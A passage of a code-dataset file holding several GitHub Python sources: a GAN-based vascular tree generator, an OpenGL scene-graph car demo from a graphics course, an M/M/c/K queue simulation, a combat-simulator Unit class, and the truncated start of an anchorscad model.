tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name + '/train')\n\n\nclass Discriminator:\n def __init__(self, name):\n self.name = name\n\n def __call__(self, inputs, label, reuse=False, is_sn=False):\n with tf.variable_scope(name_or_scope=self.name, reuse=reuse):\n label = tf.reshape(label, [batch_size, 1, 1, classfied_num])\n inputs = conv_cond_concat(inputs, label)\n\n # conv1\n # conv(inputs, filter_shape, strides, is_sn, padding=\"SAME\")\n with tf.variable_scope(\"conv1\"):\n output = conv(inputs, [3, 3, (1 + classfied_num), 128], [1, 2, 2, 1], is_sn, padding=\"SAME\")\n output = bn(output) # 生成器输出层,判别器输入层不用bn\n output = leaky_relu(output)\n\n # conv2\n with tf.variable_scope(\"conv2\"):\n output = conv(output, [3, 3, 128, 256], [1, 1, 2, 1], is_sn, padding=\"SAME\")\n output = bn(output)\n output = leaky_relu(output)\n\n # conv3\n with tf.variable_scope(\"conv3\"):\n output = conv(output, [3, 3, 256, 512], [1, 1, 2, 1], is_sn, padding=\"SAME\")\n output = bn(output)\n output = leaky_relu(output)\n\n with tf.variable_scope(name_or_scope=\"train\"):\n # conv4\n with tf.variable_scope(\"conv4\"):\n output = conv(output, [3, 3, 512, 1024], [1, 1, 1, 1], is_sn, padding=\"SAME\")\n output = bn(output)\n output = leaky_relu(output)\n\n # fully connected layer for generator\n with tf.variable_scope(name_or_scope=\"dfc\"):\n output = tf.contrib.layers.flatten(output)\n output = fully_connected(output, 1, is_sn)\n\n return output\n\n @property\n def var(self):\n return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name + '/train')\n\n\nclass GAN:\n # Architecture of generator and discriminator just like DCGAN.\n def __init__(self):\n self.Z = tf.placeholder(\"float\", [batch_size, 100])\n self.img = tf.placeholder(\"float\", [batch_size, width, height, channel])\n self.label = tf.placeholder(\"float\", [batch_size, classfied_num])\n D = Discriminator(\"discriminator\")\n G = Generator(\"generator\")\n self.fake_img = G(self.Z, self.label)\n\n # SNGAN, paper: SPECTRAL NORMALIZATION FOR GENERATIVE ADVERSARIAL NETWORKS\n self.real_logit = D(self.img, self.label, is_sn=True)\n self.fake_logit = D(self.fake_img, self.label, reuse=True, is_sn=True)\n\n # D_loss\n self.real_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=self.real_logit, labels=tf.ones_like(self.real_logit)))\n self.fake_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=self.fake_logit, labels=tf.zeros_like(self.fake_logit)))\n self.d_loss = tf.add(self.fake_loss, self.real_loss)\n\n # G_loss\n self.g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=self.fake_logit, labels=tf.ones_like(self.fake_logit)))\n\n # Optimizer\n self.opt_D = tf.train.AdamOptimizer(2e-4, beta1=0.5).minimize(self.d_loss, var_list=D.var)\n self.opt_G = tf.train.AdamOptimizer(2e-4, beta1=0.5).minimize(self.g_loss, var_list=G.var)\n\n self.sess = tf.Session()\n self.sess.run(tf.global_variables_initializer())\n self.saver = tf.train.Saver()\n\n def generate_branch(self, label_mom):\n\n concat_gen = []\n for loop in range(10):\n z = np.random.uniform(-1, 1, (batch_size, 100)).astype(np.float32)\n label_batch = np.zeros((batch_size, classfied_num))\n for i in range(len(label_batch)):\n label_batch[i][0] = label_mom[0]\n label_batch[i][1] = label_mom[1]\n gen = self.sess.run(self.fake_img, feed_dict={self.Z: z, self.label: label_batch})\n gen = gen.reshape(-1, width, height)\n gen = (gen + 1) / 2\n\n for j in range(len(gen)):\n concat_gen.append(gen[j])\n gen = np.array(concat_gen) # 得到生成的子分叉数组\n gen = select_axis(gen)\n gen = CrashBranchRemove(gen) # 筛除碰撞的生成分叉\n return gen\n\n def generate_tree(self, Tree_Num, modelpath, vestype):\n # 定义参数,路径\n self.saver.restore(self.sess, modelpath)\n\n threshold = 6 # 截止管径(um)\n\n if not os.path.exists(\"../Data/Generated Trees/TreeImgs_N%s_T%d\" % (net, Tree_Num)):\n os.makedirs(\"../Data/Generated Trees/TreeImgs_N%s_T%d\" % (net, Tree_Num))\n\n # 获取入口分叉,分别生长左右分叉\n if vestype == 'ven':\n root = np.load(\"../Data/Normalized Data/Entrance_Men_%s_Convergence.npy\" % net) # 静脉树入口\n elif vestype == 'art':\n root = np.load(\"../Data/Normalized Data/Entrance_Men_%s_Bifurcation.npy\" % net) # 动脉树入口\n # angle_distribution = np.load(\"../Data/Normalized Data/Jiajiao.npy\")\n #\n Tree_Data = []\n Coord_Data = []\n Coord_1, Coord_2, Coord_3, Seg_1, Seg_2, Seg_3 = get_coord_seg(root) # 获取坐标\n\n # Coord_Data: [[[Coord_x],[Coord_y]]...]\n Coord_Data.append(Coord_1)\n Coord_Data.append(Coord_2)\n Coord_Data.append(Coord_3)\n\n # Tree_Data: [[ParentNode, DaughterNode1, DaughterNode2, Diam, Length, Tortuosity, Level]...]\n Tree_Data.append([0, 2, 3] + Seg_1 + [1])\n Tree_Data.append([1, 0, 0] + Seg_2 + [2])\n Tree_Data.append([1, 0, 0] + Seg_3 + [2])\n level = 2\n\n # 以最大level血管段管径均小于等于threshold作为循环结束的条件\n Diam_List = []\n for i in range(len(Tree_Data)):\n if Tree_Data[i][-1] == level and Tree_Data[i][3] > threshold: # 沈:取终端的管径信息\n Diam_List.append(Tree_Data[i][3])\n\n while len(Diam_List) > 0:\n level += 1\n\n # Seg_Mom_List, Coord_Mom_List分别对应level最大的Tree_Data和Coord_Data, Index_List是将分叉按管径从大到小排列的血管段编号\n Seg_Mom_List, Coord_Mom_List, Index_List = GrowSeqSort(Tree_Data, Coord_Data)\n\n for i in range(len(Index_List)):\n Seg_Mom = Seg_Mom_List[Index_List[i]]\n Seg_Mom_Index = Tree_Data.index(Seg_Mom)\n Coord_Mom = Coord_Mom_List[Index_List[i]]\n\n if Seg_Mom[3] > threshold:\n folder = \"../Data/Generated Trees/TreeImgs_N%s_T%d/Epoch%d%d_\" % (net, Tree_Num, level - 1, i)\n condition = get_condition(Seg_Mom[3:5]) # 获取父系的label\n centroid_dir_rev, end_angle = angle_determine(folder, Tree_Data, Coord_Data, Coord_Mom)\n\n IsGrow = False\n loop_num = 0\n\n while not IsGrow and loop_num < 4:\n loop_num += 1\n Data_Son = gan.generate_branch(condition)\n error_th = 0.1\n error_mat = Cal_Error(Seg_Mom[3:6], Data_Son,\n error_th)\n\n while len(error_mat) == 0 and error_th < 0.5:\n error_th += 0.05\n error_mat = Cal_Error(Seg_Mom[3:6], Data_Son, error_th)\n\n for emi in range(len(error_mat)):\n branch = Data_Son[error_mat[emi][1]]\n zuo_len, you_len, zuo_angle, you_angle = Gen_Rotate(branch, centroid_dir_rev, end_angle)\n\n start_x, start_y = Coord_Mom[0][-1], Coord_Mom[1][-1]\n zuo_coord_x, zuo_coord_y = CoordTrans_R(start_x, start_y, np.array(zuo_len) * 200,\n zuo_angle)\n you_coord_x, you_coord_y = CoordTrans_R(start_x, start_y, np.array(you_len) * 200,\n you_angle)\n\n flag1 = CrashDetection(Coord_Data, [zuo_coord_x, zuo_coord_y])\n flag2 = CrashDetection(Coord_Data, [you_coord_x, you_coord_y])\n\n if flag1 & flag2:\n Coord_Data.append([zuo_coord_x, zuo_coord_y])\n Coord_Data.append([you_coord_x, you_coord_y])\n Tree_Data[Seg_Mom_Index][1:3] = [len(Tree_Data) + 1, len(Tree_Data) + 2]\n Seg_zuo, Seg_you = SegExtract(branch, Seg_Mom[3])\n Tree_Data.append([Seg_Mom_Index + 1, 0, 0] + Seg_zuo + [level])\n Tree_Data.append([Seg_Mom_Index + 1, 0, 0] + Seg_you + [level])\n IsGrow = True\n break\n print('已完成第', level, '层血管段的生成')\n Diam_List = []\n for i in range(len(Tree_Data)):\n if Tree_Data[i][-1] == level and Tree_Data[i][3] > threshold:\n Diam_List.append(Tree_Data[i][3])\n break\n print(\"=====已完成第\", Tree_Num, \"个血管树的生成=====\")\n # self.sess.close()\n return Tree_Data, Coord_Data\n\n\nif __name__ == \"__main__\":\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2\"\n\n # 参数设置\n classfied_num = 2\n width = 10\n height = 32\n channel = 1\n n_class = 131\n GAN_type = \"DSNGAN\"\n epochs = 200\n epsilon = 1e-14\n losses = []\n batch_size=128\n\n diam_list = [-1, -0.5, 0, 0.5, 1]\n len_list = [-1, 0, 1]\n\n tf.reset_default_graph()\n gan = GAN()\n vestype = 'ven'\n # vestype = 'art'\n\n # 选取生成模型\n if vestype == 'ven':\n modelpath = \"../Model_Checkpoint/PreTrain_Checkpoint/Model_420.ckpt\" # 静脉树模型\n path = \"../Data/ven Trees\"\n else:\n modelpath = \"../Model_Checkpoint/ArtTrain_Checkpoint/Model_328.ckpt\" # 动脉树模型\n path = \"../Data/art Trees\"\n\n if not os.path.exists('%s' % path):\n os.makedirs('%s' % path)\n\n # 生成树\n net_list = ['389', '546', '913']\n tree_num = 3 # 每个入口生成 tree_num 棵树\n for net in net_list:\n for Tree_Num in range(tree_num):\n Tree_Data, Coord_Data = gan.generate_tree(Tree_Num, modelpath, vestype)\n\n np.save('%s/Tree_%s_%s.npy' % (path, net, Tree_Num), Tree_Data)\n io.savemat('%s/Tree_%s_%s.mat' % (path, net, Tree_Num), {'data': Tree_Data})\n\n np.save('%s/Tree_%s_%s_Coord.npy' % (path, net, Tree_Num), Coord_Data)\n io.savemat('%s/Tree_%s_%s_Coord.mat' % (path, net, Tree_Num), {'data': Coord_Data})\n\n plot_tree(Tree_Data, Coord_Data, Tree_Num, path)\n","repo_name":"pqpqpqpqpq/Generation","sub_path":"Generation/Code/C_LVDO_CCO.py","file_name":"C_LVDO_CCO.py","file_ext":"py","file_size_in_byte":17698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71227059278","text":"# coding=utf-8\n\"\"\"\nDaniel Calderon, CC3501, 2019-1\nDrawing 3D cars via scene graph\n\"\"\"\n\nimport glfw\nfrom OpenGL.GL import *\nimport OpenGL.GL.shaders\nimport numpy as np\nimport sys\n\nimport transformations2 as tr2\nimport basic_shapes as bs\nimport scene_graph2 as sg\nimport easy_shaders as es\n\n\n# A class to store the application control\n# Add follow_car option\nclass Controller:\n def __init__(self):\n self.fillPolygon = True\n self.showAxis = False\n self.follow_car = False\n self.lights = False\n\n\n# we will use the global controller as communication with the callback function\ncontroller = Controller()\n\n\ndef on_key(window, key, scancode, action, mods):\n\n if action != glfw.PRESS:\n return\n \n global controller\n\n if key == glfw.KEY_SPACE:\n controller.fillPolygon = not controller.fillPolygon\n\n elif key == glfw.KEY_LEFT_CONTROL:\n controller.showAxis = not controller.showAxis\n\n elif key == glfw.KEY_ESCAPE:\n sys.exit()\n\n elif key == glfw.KEY_C:\n controller.follow_car = not controller.follow_car\n\n else:\n print('Unknown key')\n\n# Create car depending of isNormal value\ndef createCar(r1,g1,b1, r2, g2, b2, isNormal):\n if isNormal:\n gpuBlackQuad = es.toGPUShape(bs.createColorNormalsCube(0, 0, 0))\n gpuChasisQuad_color1 = es.toGPUShape(bs.createColorNormalsCube(r1, g1, b1))\n gpuChasisQuad_color2 = es.toGPUShape(bs.createColorNormalsCube(r2, g2, b2))\n gpuChasisPrism = es.toGPUShape(bs.createColorNormalTriangularPrism(153 / 255, 204 / 255, 255 / 255))\n else:\n gpuBlackQuad = es.toGPUShape(bs.createColorCube(0,0,0))\n gpuChasisQuad_color1 = es.toGPUShape(bs.createColorCube(r1,g1,b1))\n gpuChasisQuad_color2 = es.toGPUShape(bs.createColorCube(r2,g2,b2))\n gpuChasisPrism = es.toGPUShape(bs.createColorTriangularPrism(153/255, 204/255, 255/255))\n \n # Cheating a single wheel\n wheel = sg.SceneGraphNode(\"wheel\")\n wheel.transform = tr2.scale(0.2, 0.8, 0.2)\n wheel.childs += [gpuBlackQuad]\n\n wheelRotation = sg.SceneGraphNode(\"wheelRotation\")\n wheelRotation.childs += [wheel]\n\n # Instanciating 2 wheels, for the front and back parts\n frontWheel = sg.SceneGraphNode(\"frontWheel\")\n frontWheel.transform = tr2.translate(0.3,0,-0.3)\n frontWheel.childs += [wheelRotation]\n\n backWheel = sg.SceneGraphNode(\"backWheel\")\n backWheel.transform = tr2.translate(-0.3,0,-0.3)\n backWheel.childs += [wheelRotation]\n \n # Creating the bottom chasis of the car\n bot_chasis = sg.SceneGraphNode(\"bot_chasis\")\n bot_chasis.transform = tr2.scale(1.1,0.7,0.1)\n bot_chasis.childs += [gpuChasisQuad_color1]\n\n # Moving bottom chasis\n moved_b_chasis = sg.SceneGraphNode(\"moved_b_chasis\")\n moved_b_chasis.transform = tr2.translate(0, 0, -0.2)\n moved_b_chasis.childs += [bot_chasis]\n\n # Creating light support\n light_s = sg.SceneGraphNode(\"light_s\")\n light_s.transform = tr2.scale(1, 0.1, 0.1)\n light_s.childs += [gpuChasisQuad_color2]\n\n # Creating right light\n right_light = sg.SceneGraphNode(\"right_light\")\n right_light.transform = tr2.translate(0, 0.25, 0)\n right_light.childs += [light_s]\n\n # Moving right light\n left_light = sg.SceneGraphNode(\"left_light\")\n left_light.transform = tr2.translate(0, -0.25, 0)\n left_light.childs += [light_s]\n\n # Creating center chasis\n center_chasis = sg.SceneGraphNode(\"center_chasis\")\n center_chasis.transform = tr2.scale(1, 0.4, 0.15)\n center_chasis.childs += [gpuChasisQuad_color1]\n\n # Moving center chasis\n m_center_chasis = sg.SceneGraphNode(\"m_center_chasis\")\n m_center_chasis.transform = tr2.translate(0.05, 0, 0)\n m_center_chasis.childs += [center_chasis]\n\n # Creating center quad\n center_quad = sg.SceneGraphNode(\"center_quad\")\n center_quad.transform = tr2.scale(0.26, 0.5, 0.2)\n center_quad.childs += [gpuChasisQuad_color2]\n\n # Moving center quad\n m_center_quad = sg.SceneGraphNode(\"m_center_quad\")\n m_center_quad.transform = tr2.translate(-0.07, 0, 0.1)\n m_center_quad.childs += [center_quad]\n\n # Creating front wind shield\n f_wind_shield = sg.SceneGraphNode(\"f_wind_shield\")\n f_wind_shield.transform = tr2.scale(0.25, 0.5, 0.2)\n f_wind_shield.childs += [gpuChasisPrism]\n\n # Moving front wind shield\n m_f_wind_shield = sg.SceneGraphNode(\"m_f_wind_shield\")\n m_f_wind_shield.transform = tr2.translate(0.2, 0, 0.1)\n m_f_wind_shield.childs += [f_wind_shield]\n\n # Creating back wind shield\n b_wind_shield = sg.SceneGraphNode(\"b_wind_shield\")\n b_wind_shield.transform = tr2.scale(0.25, 0.5, 0.2)\n b_wind_shield.childs += [gpuChasisPrism]\n\n # Rotate back wind shield\n r_b_wind_shield = sg.SceneGraphNode(\"r_b_wind_shield\")\n r_b_wind_shield.transform = tr2.rotationZ(np.pi)\n r_b_wind_shield.childs += [b_wind_shield]\n\n # Moving back wind shield\n m_b_wind_shield = sg.SceneGraphNode(\"m_b_wind_shield\")\n m_b_wind_shield.transform = tr2.translate(-0.3, 0, 0.1)\n m_b_wind_shield.childs += [r_b_wind_shield]\n\n # Joining chasis parts\n complete_chasis = sg.SceneGraphNode(\"complete_chasis\")\n complete_chasis.childs += [moved_b_chasis]\n complete_chasis.childs += [right_light]\n complete_chasis.childs += [left_light]\n complete_chasis.childs += [m_center_chasis]\n complete_chasis.childs += [m_center_quad]\n complete_chasis.childs += [m_b_wind_shield]\n complete_chasis.childs += [m_f_wind_shield]\n\n\n # All pieces together\n car = sg.SceneGraphNode(\"car\")\n car.childs += [complete_chasis]\n car.childs += [frontWheel]\n car.childs += [backWheel]\n\n return car\n\n# Create ground with textures\ndef createGround():\n gpuGround_texture = es.toGPUShape(bs.createTextureQuad(\"ground.jpg\"), GL_REPEAT, GL_NEAREST)\n ground_scaled = sg.SceneGraphNode(\"ground_scaled\")\n ground_scaled.transform = tr2.scale(10, 10, 10)\n ground_scaled.childs += [gpuGround_texture]\n\n ground_rotated = sg.SceneGraphNode(\"ground_rotated_x\")\n ground_rotated.transform = tr2.rotationX(0)\n ground_rotated.childs += [ground_scaled]\n\n ground = sg.SceneGraphNode(\"ground\")\n ground.transform = tr2.translate(0, 0, 0)\n ground.childs += [ground_rotated]\n\n return ground\n\n# Create image of ricardo\ndef createRicardo_1(filename):\n gpuAirport_texture = es.toGPUShape(bs.createTextureQuad(filename), GL_REPEAT, GL_LINEAR)\n ricardo_1_scaled = sg.SceneGraphNode(\"ricardo_scaled\")\n ricardo_1_scaled.transform = tr2.scale(3, 3, 3)\n ricardo_1_scaled.childs += [gpuAirport_texture]\n\n ricardo_1_rotated = sg.SceneGraphNode(\"ricardo_rotated\")\n ricardo_1_rotated.transform = np.matmul(tr2.rotationX(np.pi / 2), tr2.rotationY(np.pi / 2))\n ricardo_1_rotated.childs += [ricardo_1_scaled]\n\n ricardo_1 = sg.SceneGraphNode(\"ricardo\")\n ricardo_1.transform = tr2.translate(6, 0, 1)\n ricardo_1.childs += [ricardo_1_rotated]\n\n return ricardo_1\n\nif __name__ == \"__main__\":\n\n # Initialize glfw\n if not glfw.init():\n sys.exit()\n\n width = 1000\n height = 1000\n\n window = glfw.create_window(width, height, \"Aux 5\", None, None)\n\n if not window:\n glfw.terminate()\n sys.exit()\n\n glfw.make_context_current(window)\n\n # Connecting the callback function 'on_key' to handle keyboard events\n glfw.set_key_callback(window, on_key)\n\n # Assembling the shader program (pipeline) with shaders (simple, texture and lights)\n mvcPipeline = es.SimpleModelViewProjectionShaderProgram()\n textureShaderProgram = es.SimpleTextureModelViewProjectionShaderProgram()\n phongPipeline = es.SimplePhongShaderProgram()\n\n\n\n\n # Setting up the clear screen color\n glClearColor(1, 1, 1, 1.0)\n\n # As we work in 3D, we need to check which part is in front,\n # and which one is at the back\n glEnable(GL_DEPTH_TEST)\n\n # Creating shapes on GPU memory\n gpuAxis = es.toGPUShape(bs.createAxis(7))\n redCarNode = createCar(252/255,246/255,246/255, 255/255, 153/255, 153/255, controller.lights)\n blueCarNode = createCar(252/255,246/255,246/255, 0, 76/255, 153/255, False)\n groundNode = createGround()\n ricardoNode = createRicardo_1(\"ricardo1.png\")\n blueCarNode.transform = np.matmul(tr2.rotationZ(-np.pi/4), tr2.translate(3.0,0,0.5))\n\n # Define radius of the circumference\n r = 2\n\n # lookAt of normal camera\n normal_view = tr2.lookAt(\n np.array([5, 5, 6]),\n np.array([0, 0, 0]),\n np.array([0, 0, 1])\n )\n\n\n while not glfw.window_should_close(window):\n\n # Telling OpenGL to use our shader program\n glUseProgram(mvcPipeline.shaderProgram)\n # Using the same view and projection matrices in the whole application\n projection = tr2.perspective(45, float(width) / float(height), 0.1, 100)\n glUniformMatrix4fv(glGetUniformLocation(mvcPipeline.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n\n # Calculate coordinates of the camera and redCar\n u_px = np.cos(glfw.get_time())\n u_py = np.sin(glfw.get_time())\n x = r * u_px\n y = r * u_py\n\n u_tx = -u_py\n u_ty = u_px\n\n if controller.follow_car:\n # moving camera\n normal_view = tr2.lookAt(\n np.array([x, y, 1]),\n np.array([x + r * u_tx, y + r * u_ty, 1]),\n np.array([0, 0, 1])\n )\n else:\n # static camera\n normal_view = tr2.lookAt(\n np.array([5, 5, 6]),\n np.array([0, 0, 0]),\n np.array([0, 0, 1])\n )\n\n glUniformMatrix4fv(glGetUniformLocation(mvcPipeline.shaderProgram, \"view\"), 1, GL_TRUE, normal_view)\n\n # Using GLFW to check for input events\n glfw.poll_events()\n\n # Clearing the screen in both, color and depth\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n # Filling or not the shapes depending on the controller state\n if (controller.fillPolygon):\n glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)\n else:\n glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n\n if controller.showAxis:\n glUniformMatrix4fv(glGetUniformLocation(mvcPipeline.shaderProgram, \"model\"), 1, GL_TRUE, tr2.identity())\n mvcPipeline.drawShape(gpuAxis, GL_LINES)\n\n # Moving the red car and rotating its wheels\n redCarNode.transform = np.matmul(tr2.translate(0, 0, 0.5), tr2.translate(x, y, 0))\n redCarNode.transform = np.matmul(redCarNode.transform, tr2.rotationZ(glfw.get_time() + np.pi / 2))\n redWheelRotationNode = sg.findNode(redCarNode, \"wheelRotation\")\n redWheelRotationNode.transform = tr2.rotationY(10 * glfw.get_time())\n\n # Uncomment to print the red car position on every iteration\n #print(sg.findPosition(redCarNode, \"car\"))\n\n # Drawing the Car\n sg.drawSceneGraphNode(blueCarNode, mvcPipeline)\n if not controller.lights:\n sg.drawSceneGraphNode(redCarNode, mvcPipeline)\n\n\n else:\n # Drawing redCar using light shader\n glUseProgram(phongPipeline.shaderProgram)\n\n # Setting all uniform shader variables\n glUniform3f(glGetUniformLocation(phongPipeline.shaderProgram, \"lightColor\"), 1.0, 1.0, 1.0)\n glUniform3f(glGetUniformLocation(phongPipeline.shaderProgram, \"lightPos\"), -5, -5, 5)\n glUniform3f(glGetUniformLocation(phongPipeline.shaderProgram, \"viewPos\"), 5, 5, 6)\n glUniform1ui(glGetUniformLocation(phongPipeline.shaderProgram, \"shininess\"), 100)\n glUniform1f(glGetUniformLocation(phongPipeline.shaderProgram, \"constantAttenuation\"), 0.001)\n glUniform1f(glGetUniformLocation(phongPipeline.shaderProgram, \"linearAttenuation\"), 0.1)\n glUniform1f(glGetUniformLocation(phongPipeline.shaderProgram, \"quadraticAttenuation\"), 0.01)\n\n glUniformMatrix4fv(glGetUniformLocation(phongPipeline.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n glUniformMatrix4fv(glGetUniformLocation(phongPipeline.shaderProgram, \"view\"), 1, GL_TRUE, normal_view)\n\n sg.drawSceneGraphNode(redCarNode, phongPipeline)\n\n\n # Drawing ground and ricardo using texture shader\n glUseProgram(textureShaderProgram.shaderProgram)\n glUniformMatrix4fv(glGetUniformLocation(textureShaderProgram.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n glUniformMatrix4fv(glGetUniformLocation(textureShaderProgram.shaderProgram, \"view\"), 1, GL_TRUE, normal_view)\n # Drawing ground\n sg.drawSceneGraphNode(groundNode, textureShaderProgram)\n sg.drawSceneGraphNode(ricardoNode, textureShaderProgram)\n\n\n # Once the render is done, buffers are swapped, showing only the complete scene.\n glfw.swap_buffers(window)\n\n glfw.terminate()","repo_name":"CC3501/CC3501-2019-1","sub_path":"aux5/aux_5.py","file_name":"aux_5.py","file_ext":"py","file_size_in_byte":12842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"5686109278","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 30 2020\n\nModule for M/M/c/K queue problem.\n\n@author: Almas Fauzia\n Gregorius Aria Neruda\n Rayhan Naufal Ramadhan\n\"\"\"\n\nimport random\nimport queue\nimport math\nimport csv\nimport sys\n\n\nclass Event:\n def __init__(self):\n self.eventType = None\n self.rate = CDF_inverse(random.random())\n self.server_label = None # denotes which server\n\n def arrival(self):\n self.eventType = 'arrival'\n\n def service(self, server_label):\n self.eventType = 'service'\n self.server_label = server_label\n # if eventType == arrival, rate is the time needed until the next customer arrives\n # if eventType == service, rate is the time needed for server to serve the customer that is in it\n\n\ndef decrease_rate(tempEvent, listOfEvents):\n for event in listOfEvents:\n if event.eventType == 'arrival' or (event.eventType == 'service' and not servers[event.server_label].empty()):\n event.rate -= tempEvent.rate\n # if event.eventType == 'arrival':\n # writer.writerow([f'[Time: {str(time)}] Remaining {event.eventType} time in Queue: {str(event.rate)}'])\n # else:\n # writer.writerow([f'[Time: {str(time)}] Remaining {event.eventType} time in Server {str(event.server_label)}: {str(event.rate)}'])\n return listOfEvents\n\n\n# function to calculate rate from exponential distribution\ndef CDF_inverse(CDF):\n return -1 * math.log(1-CDF) / exp_dist_lambda\n\n\ndef init_queue(q, server_label):\n global custArrive\n global custServiced\n global time\n global n\n global i\n global listOfEvents\n\n i += 1\n custArrive = i\n q.put_nowait(custArrive)\n n -= 1\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custArrive)} is entering the queue.'])\n newEvent = Event()\n newEvent.arrival()\n listOfEvents.append(newEvent)\n # writer.writerow([f'[Time: {str(time)}] Next {newEvent.eventType} in {str(newEvent.rate)}'])\n\n custServiced = q.get_nowait()\n servers[server_label].put_nowait(custServiced)\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custServiced)} is being served in Server {server_label}.'])\n for server in range(SERVERS):\n newEvent = Event()\n newEvent.service(server)\n listOfEvents.append(newEvent)\n # writer.writerow([f'[Time: {str(time)}] Next completed {newEvent.eventType} for Server {server_label} in {str(newEvent.rate)}'])\n\n\ndef start_queue(q, server_label, temp):\n global custArrive\n global custServiced\n global time\n global n\n global i\n global listOfEvents\n global haventArrived\n global dropped\n\n if temp.eventType == 'arrival':\n i += 1\n custArrive = i\n time += temp.rate\n listOfEvents.remove(temp)\n\n # if the arrival happens because of other than haventArrived situation\n if not haventArrived:\n listOfEvents = decrease_rate(temp, listOfEvents)\n newEvent = Event()\n newEvent.arrival()\n try:\n q.put_nowait(custArrive)\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custArrive)} is entering the queue.'])\n\n # if there is no queue, find empty server\n for server_label in range(len(servers)):\n if q.qsize() == 1 and not servers[server_label].full():\n custServiced = q.get_nowait()\n servers[server_label].put_nowait(custServiced)\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custServiced)} is being served in Server {server_label}.'])\n break\n except Exception:\n writer.writerow(\n [f'[Time: {str(time)}] Queue is full, Customer{str(custArrive)} is dropped from Queue.'])\n dropped.append(custArrive)\n else:\n time += temp.rate\n newEvent = Event()\n newEvent.service(server_label)\n listOfEvents.remove(temp)\n listOfEvents = decrease_rate(temp, listOfEvents)\n custServiced = servers[server_label].get_nowait()\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custServiced)} is leaving Server {server_label}.'])\n\n # if the next customer have arrived, the next customer is entering the server\n if not q.empty():\n custServiced = q.get_nowait()\n servers[server_label].put_nowait(custServiced)\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custServiced)} is being served in Server {server_label}.'])\n\n listOfEvents.append(newEvent)\n # if (newEvent.eventType == 'arrival'):\n # writer.writerow([f'[Time: {str(time)}] Next {newEvent.eventType} in {str(newEvent.rate)}'])\n # else:\n # writer.writerow([f'[Time: {str(time)}] Next completed {newEvent.eventType} for Server {server_label} in {str(newEvent.rate)}'])\n\n n -= 1\n haventArrived = False\n\n\ndef main():\n q = queue.Queue(QUEUE_SIZE)\n for server in range(SERVERS):\n servers.append(queue.Queue(1))\n init_queue(q, 0)\n\n while n > 0:\n # restore events\n for event in eventsOnHold:\n eventsOnHold.remove(event)\n listOfEvents.append(event)\n\n # take the first coming event from queue\n temp = sorted(listOfEvents, key=lambda event: event.rate)[0]\n # search for an arrival event if temp is service event but the next customer have not arrived yet\n while (temp.eventType == 'service'):\n if (q.empty()) & (servers[temp.server_label].empty()):\n # writer.writerow([f'[Time: {str(time)}] Next customer have not arrived yet in Queue.'])\n haventArrived = True\n\n eventsOnHold.append(temp)\n listOfEvents.remove(temp)\n temp = sorted(listOfEvents, key=lambda event: event.rate)[0]\n else:\n break\n\n start_queue(q, temp.server_label, temp)\n\n\nif __name__ == '__main__':\n try: # Global variables\n # maximum number of customers inside queue (K-1), set to `0` if infinite\n QUEUE_SIZE = int(sys.argv[2])\n\n # number of servers (c)\n SERVERS = int(sys.argv[1])\n\n exp_dist_lambda = 0.5\n custArrive = 0\n custServiced = 0\n n = 150 # number of events\n i = 0 # customer id\n time = 0\n\n dropped = []\n servers = []\n listOfEvents = []\n eventsOnHold = [] # list to store events on-hold\n haventArrived = False\n\n # build .csv file to save the log\n file = open('logMMcK.csv', 'w', newline='')\n writer = csv.writer(file)\n\n main()\n except IndexError:\n print(\"One or more arguments is missing \\n\")\n print(\"usage: python ./MMcK.py \\n\")\n print(\"- c : number of servers\")\n print(\"- K : maximum number of customers in queue (excluding customer being served) \\n\")\n sys.exit(1)\n","repo_name":"almasfw/antrian","sub_path":"MMcK.py","file_name":"MMcK.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"36818934563","text":"\"\"\"\n单位\n\"\"\"\n\nfrom ..base.attribute import UnitAttribute_t\nfrom ..base.damage import Damage_t, DamageStatus\n\n\nclass Unit:\n \"\"\"单位类\"\"\"\n\n name: str\n \"\"\"名称\"\"\"\n HP: int\n \"\"\"当前生命\"\"\"\n unit_attribute: UnitAttribute_t\n \"\"\"单位属性\"\"\"\n\n def __init__(self, name: str, attribute: UnitAttribute_t) -> None:\n self.name = name\n self.unit_attribute = attribute\n\n @property\n def alive(self) -> bool:\n \"\"\"存活状态\"\"\"\n return self.HP > 0\n\n def reset_HP(self) -> None:\n \"\"\"重置生命值\"\"\"\n self.HP = self.unit_attribute.HP\n\n def get_hurt(self, damage: Damage_t) -> None:\n \"\"\"单位受伤\"\"\"\n if damage.status == DamageStatus.Missed:\n return\n\n if damage.value > self.HP:\n self.HP = 0\n else:\n self.HP -= damage.value\n","repo_name":"JustUndertaker/combat_simulation","sub_path":"combat_simulation/uint/uint.py","file_name":"uint.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"32402957773","text":"'''\nCreated on 29 May 2022\n\n@author: gianni\n'''\n\nimport anchorscad as ad\nfrom anchorscad.models.basic.regular_prism import RegularPrism\n\n\n@ad.shape\n@ad.datatree\nclass 